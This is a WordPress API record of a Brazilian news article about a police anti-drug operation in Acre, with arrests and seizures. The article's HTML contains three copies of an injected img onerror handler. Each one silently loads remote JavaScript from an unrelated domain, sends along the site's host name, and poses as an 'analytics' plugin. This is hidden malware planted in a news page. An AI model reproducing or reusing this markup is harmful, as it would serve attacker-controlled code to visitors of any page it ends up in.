{"id":51656,"date":"2020-12-04T19:29:45","date_gmt":"2020-12-04T19:29:45","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/04\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/"},"modified":"2020-12-04T19:29:45","modified_gmt":"2020-12-04T19:29:45","slug":"policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/","title":{"rendered":"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Dez mandados de pris\u00e3o foram cumpridos em diversos munic\u00edpios<\/span><\/p>\n<p style=\"text-align: justify;\">A Pol\u00edcia civil deflagrou na manh\u00e3 desta sexta-feira (4) a Opera\u00e7\u00e3o Sentinela de combate ao narcotr\u00e1fico nos munic\u00edpios de Cruzeiro do Sul, Tarauac\u00e1 e Manoel Urbano, foram cumpridos dez mandados de pris\u00e3o, oito de busca e apreens\u00e3o e apreens\u00e3o de dez ve\u00edculos, al\u00e9m de bloqueio de contas banc\u00e1rias.<\/p>\n<p style=\"text-align: justify;\">Dez pessoas ligadas diretamente com o crime de tr\u00e1fico e associa\u00e7\u00e3o para o tr\u00e1fico de drogas, al\u00e9m de lavagem de dinheiro foram presas. Os mandados judiciais foram cumpridos em Rio Branco, Manoel Urbano e Cruzeiro do Sul.<\/p>\n<p style=\"text-align: justify;\">O trabalho investigativo durou cerca de seis meses e identificou uma associa\u00e7\u00e3o de narcotraficantes que operava no transporte de grandes quantidades de drogas e muni\u00e7\u00f5es de Cruzeiro do Sul para abastecer a capital, Rio Branco, utilizando autom\u00f3veis e caminh\u00f5es. No dia 28 de agosto foram apreendidas 93 kg de maconha, mais de 100 muni\u00e7\u00f5es para pistola e rev\u00f3lver e 260 muni\u00e7\u00f5es para fuzil do tipo AK-47 em Feij\u00f3.<\/p>\n<p style=\"text-align: justify;\">Em Cruzeiro do Sul foram presas cinco pessoas, respons\u00e1veis pelo sequestro de um caminh\u00e3o tipo guincho e sete ve\u00edculos de passeio. Em Manuel Urbano foi preso um traficante, com alto poder de articula\u00e7\u00e3o, que se deslocava de Rio Branco para Cruzeiro do Sul, bem como foi apreendido um ve\u00edculo. Em Tarauac\u00e1 foi apreendido um ve\u00edculo e em Rio Branco, quatro pessoas foram presas, sendo uma delas traficante, tamb\u00e9m com alto poder de articula\u00e7\u00e3o.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div id=\"janelamailtopopupMail\" style=\"z-index: 1;\">\n<div id=\"janelamailtocontentPopupModalMail\">\n<div id=\"janelamailtomailClosePopup\">&nbsp;<\/div>\n<div id=\"janelamailtopopupMailModal\">What do you want to do ?<\/div>\n<p> <a id=\"janelamailtobuttonOpenEmailAppNew\">New mail<\/a><button id=\"janelamailtoclipboardButtonCopyEmail\">Copy<\/button><textarea id=\"janelamailtotoSelectClipboardCopyText\"><\/textarea><\/div><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Dez mandados de pris\u00e3o foram cumpridos em diversos munic\u00edpios<\/span><\/p>\n","protected":false},"author":4,"featured_media":51655,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-51656","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Dez mandados de pris\u00e3o foram cumpridos em diversos munic\u00edpios\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-04T19:29:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/\",\"name\":\"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg\",\"datePublished\":\"2020-12-04T19:29:45+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg\",\"width\":458,\"height\":340,\"caption\":\"04-12-2020 opera\u00e7\u00e3o-sentinela-em-combate-ao-narcotr\u00e1fico\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/","og_locale":"pt_BR","og_type":"article","og_title":"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net","og_description":"Dez mandados de pris\u00e3o foram cumpridos em diversos munic\u00edpios","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-04T19:29:45+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg","type":"image\/jpeg"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/","name":"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg","datePublished":"2020-12-04T19:29:45+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/04-12-2020_operacao-sentinela-em-combate-ao-narcotrafico.jpeg","width":458,"height":340,"caption":"04-12-2020 opera\u00e7\u00e3o-sentinela-em-combate-ao-narcotr\u00e1fico"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/policia-civil-deflagra-operacao-sentinela-de-combate-ao-narcotrafico\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Pol\u00edcia Civil deflagra Opera\u00e7\u00e3o Sentinela de combate ao tr\u00e1fico"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=51656"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/51656\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/51655"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=51656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=51656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=51656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}